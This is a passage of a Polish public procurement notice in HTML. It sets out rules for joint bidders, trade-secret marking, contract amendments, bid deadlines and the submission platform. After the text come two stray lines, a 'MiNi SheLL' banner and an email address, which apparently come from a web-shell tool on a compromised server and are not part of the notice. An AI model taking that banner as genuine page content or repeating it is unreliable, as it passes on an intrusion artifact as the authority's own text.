w tym zakresie- na etapie składania oferty. Jeśli Wykonawca złoży oświadczenie, że oferuje produkt równoważny, a nie złoży przedmiotowych środków dowodowych- Zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym terminie.<br/>Pełnomocnictwo udzielane osobom podpisującym ofertę lub inne dokumenty składane z ofertą, o ile prawo do reprezentowania Wykonawcy w powyższym zakresie nie wynika wprost z dokumentów rejestrowych lub bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca dostarczył dane umożliwiające dostęp do tych dokumentów; (jeżeli dotyczy); <br/>Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeżeli dotyczy); <br/>6)	Uzasadnienie zastrzeżenia informacji stanowiącej tajemnicę przedsiębiorstwa, o ile dotyczą; <br/>Tajemnica przedsiębiorstwa: <br/>Jeżeli według Wykonawcy, oferta będzie zawierała informacje objęte tajemnicą jego przedsiębiorstwa w rozumieniu przepisów ustawy z 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji, dane informacje muszą być oznaczone klauzulą „NIE UDOSTĘPNIAĆ – TAJEMNICA PRZEDSIĘBIORSTWA” i powinny być – zgodnie z Rozporządzeniem Prezesa Rady Ministrów w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie - załączone oddzielnie w osobnym / wyodrębnionym pliku. Jednocześnie Wykonawca, nie później niż wraz z przekazaniem takich informacji, musi zastrzec, że nie mogą być one udostępniane oraz wykazać, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa w rozumieniu ww. ustawy zgodnie z pkt. 2) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1)	Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych Wykonawców wspólnie ubiegających się o udzielenie zamówienia . <br/>2)	Wykonawcy wspólnie ubiegający się o zamówienie (Konsorcjum/ wspólnicy spółki cywilnej) w rozumieniu art. 58 ustawy Pzp: <br/>a)	ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia i wniesienie zabezpieczenia należytego wykonania umowy; <br/>b)	ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia, zgodnie z art. 58 ust. 2 ustawy Pzp – fakt ustanowienia pełnomocnika musi wynikać z załączonych do oferty dokumentów – wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem;<br/>3)	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie dotyczące braku podstaw do wykluczenia oraz oświadczenie potwierdzające spełnianie warunków udziału w postępowaniu składa odrębnie każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie stanowiące załącznik nr 4 do SWZ, z którego wynika, które usługi wykonają poszczególni wykonawcy. <br/>5)	Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców wspólnie ubiegających się o zamówienie. <br/>6)	Wymagania dotyczące wykonawcy stosuje się odpowiednio do wykonawców, wspólnie ubiegających się o udzielenie zamówienia. <br/>7)	Jeżeli oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych wykonawców. <br/>8)	Zgodnie z art. 117. ust. 2 ustawy Pzp - warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt 2 ustawy Pzp, jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane. <br/>9)	W przypadku, o którym mowa w pkt 8), wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy – według wzoru – załącznika Nr 4 do SWZ. <br/>10)	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego żaden z nich nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt 2, 3, 4 ustawy Pzp, natomiast spełnianie warunków udziału w postępowaniu wykazują zgodnie z pkt. 10). <br/>11)	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, składa każdy z Wykonawców (na wezwanie Zamawiającego). <br/>13)	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców są oni zobowiązani na wezwanie Zamawiającego złożyć dokumenty i oświadczenia, potwierdzające spełnianie warunków udziału w postępowaniu, przy czym dokumenty te składa odpowiednio. Wykonawca/Wykonawcy, który/którzy wykazuje/ą spełnianie warunku, w zakresie i na zasadach opisanych w niniejszej SWZ. <br/>14)	Dokumenty i oświadczenia potwierdzające brak podstaw wykluczenia składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>15)	Na podstawie art. 226 ust. 1 pkt 2 ustawy Pzp Zamawiający odrzuci ofertę a)	podlegającego wykluczeniu z postępowania lub <br/>b)	niespełniającego warunków udziału w postępowaniu, lub <br/>c)	który nie złożył w przewidzianym terminie oświadczenia, o którym mowa wart.125 ust.1 ustawy Pzp <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy mogą być dokonywane w zakresie dopuszczonym przez ustawę Prawo zamówień publicznych, wymagają zgodnej woli stron oraz zachowania formy pisemnej w postaci aneksu, pod rygorem nieważności w poniższym zakresie: <br/>1)	Zamawiający dopuszcza możliwość zmiany osób odpowiedzialnych za realizację umowy, jeżeli zajdzie taka potrzeba – w przypadku rozwiązania lub wygaśnięcia stosunku pracy z daną osobą lub zdarzenia losowego, choroby uniemożliwiającej pełnienie powierzonych jej obowiązków; <br/>2)	wartość umowy może ulec zmianie w przypadku zmiany ustawowej stawki podatku VAT, w zakresie wynikającym z tej zmiany; <br/>3)	zmiany określonego producenta, typu i modeli w przedmiocie Umowy, w przypadku zakończenia jego produkcji lub wycofania go z produkcji, z tym że wynagrodzenie wskazane w § 2 Umowy nie może ulec podwyższeniu, a parametry techniczne nie mogą być gorsze niż występujące pierwotnie w przedmiocie Umowy, <br/>4)	zgodnie z art. 455 ust. 2 ustawy Prawy zamówień publicznych dopuszczalne są zmiany umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia, których łączna wartość jest mniejsza niż progi unijne oraz jest niższa niż 10% wartości pierwotnej umowy, w przypadku zamówień na usługi lub dostawy, a zmiany te nie powodują zmiany ogólnego charakteru umowy – na tej podstawie całkowita wartość umowy może ulec zwiększeniu o nie więcej niż 10% wartości określonej pierwotnie w umowie, w § 2 ust. 1 umowy na skutek nieznacznego zwiększenia zakresu zamówienia. Zamawiający dokonywać będzie weryfikacji zaproponowanych cen jednostkowych w celu stwierdzenia czy nie przekraczają one aktualnych cen rynkowych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-15 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1.	Ofertę wraz z dokumentami określonymi w rozdziale XI pkt. 2 i 3 należy złożyć za pośrednictwem platformy pod adresem https://platformazakupowa.pl/pn/41blsz/proceedings,na stronie dotyczącej odpowiedniego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-15 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Tryb udzielenia zamówienia<br/><br/>1.	Postępowanie o udzielenie zamówienia publicznego prowadzone jest w trybie podstawowym, w wariancie, o którym mowa w art. 275 pkt 1 ustawy z dnia 11 września 2019r (t.j. Dz. U. z 2021, poz. 1129 ze zm.) Prawo zamówień publicznych, zgodnie z wymogami określonymi w niniejszej Specyfikacji Warunków Zamówienia, zwanej dalej „SWZ”. <br/>2.	Postępowania prowadzone jest w trybie podstawowym o wartości szacunkowej nie przekraczającej w złotych równowartości kwoty określonej dla dostaw i usług w przepisach wydanych na podstawie art. 3 ust. 3 ustawy Pzp tj. 140 000,00 Euro.<br/>3.	Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z możliwością prowadzenia negocjacji.<br/>4.	Do udzielenia przedmiotowego zamówienia stosuje się przepisy ustawy z dnia 11 września 2019r. – Prawo zamówień publicznych, zwanej dalej „ustawą”, a w sprawach nieuregulowanych ustawą, przepisy ustawy – Kodeks cywilny z dnia 23.04.1964r. <br/>5.	Do niniejszego postępowania mają zastosowanie przepisy określone w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie. <br/>6.	Dokumentacja prowadzonego postępowania oraz wszelkie zmiany i wyjaśnienia treści SWZ dostępne będą na stronie prowadzonego postępowania pod adresem: https://platformazakupowa.pl/pn/41blsz/proceedings, zwanej dalej „Platformą”. <br/><br/>2.	Oferty wariantowe<br/>Zamawiający nie dopuszcza możliwości składania ofert wariantowych.<br/><br/>3.	Zamawiający nie dopuszcza składania ofert w postaci katalogów elektronicznych lub dołączenia katalogów elektronicznych do oferty;<br/><br/>4.	Umowa ramowa<br/>Zamawiający nie przewiduje zawarcia umowy ramowej; <br/><br/>5.	Aukcja elektroniczna<br/>Zamawiający nie przewiduje wyboru oferty najkorzystniejszej z zastosowaniem aukcji elektronicznej;<br/><br/>6.	Zamówienia, o których mowa w art. 214 ust. 1 pkt 8 ustawy Pzp<br/>Zamawiający nie przewiduje możliwości udzielenia dotychczasowemu wykonawcy usług, o których mowa w art. 214 ust. 1 pkt 8 ustawy Pzp, polegających na powtórzeniu podobnych usług, zgodnych z przedmiotem zamówienia podstawowego.<br/><br/>7.	Rozliczenia w walutach obcych<br/>Zamawiający nie przewiduje rozliczenia w walutach obcych.<br/>8.	Zwrot kosztów udziału w postępowaniu<br/>Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.<br/>9.	Zaliczki na poczet udzielenia zamówienia<br/>Zamawiający nie przewiduje udzielania zaliczek na poczet realizacji zamówienia przez Wykonawcę;<br/>10.	Unieważnienie postępowania <br/>Zamawiający przewiduje możliwość unieważnienia postępowania o udzielenie zamówienia na podstawie art. 255 oraz 256 ustawy Pzp. <br/><br/>11.	Rozliczenia między Zamawiającym, a Wykonawcą. <br/>Rozliczenia między Zamawiającym, a Wykonawcą będą prowadzone w złotych polskich (PLN). <br/><br/>12.	Postępowanie prowadzone jest w języku polskim.

Creat By MiNi SheLL
Email: jattceo@gmail.com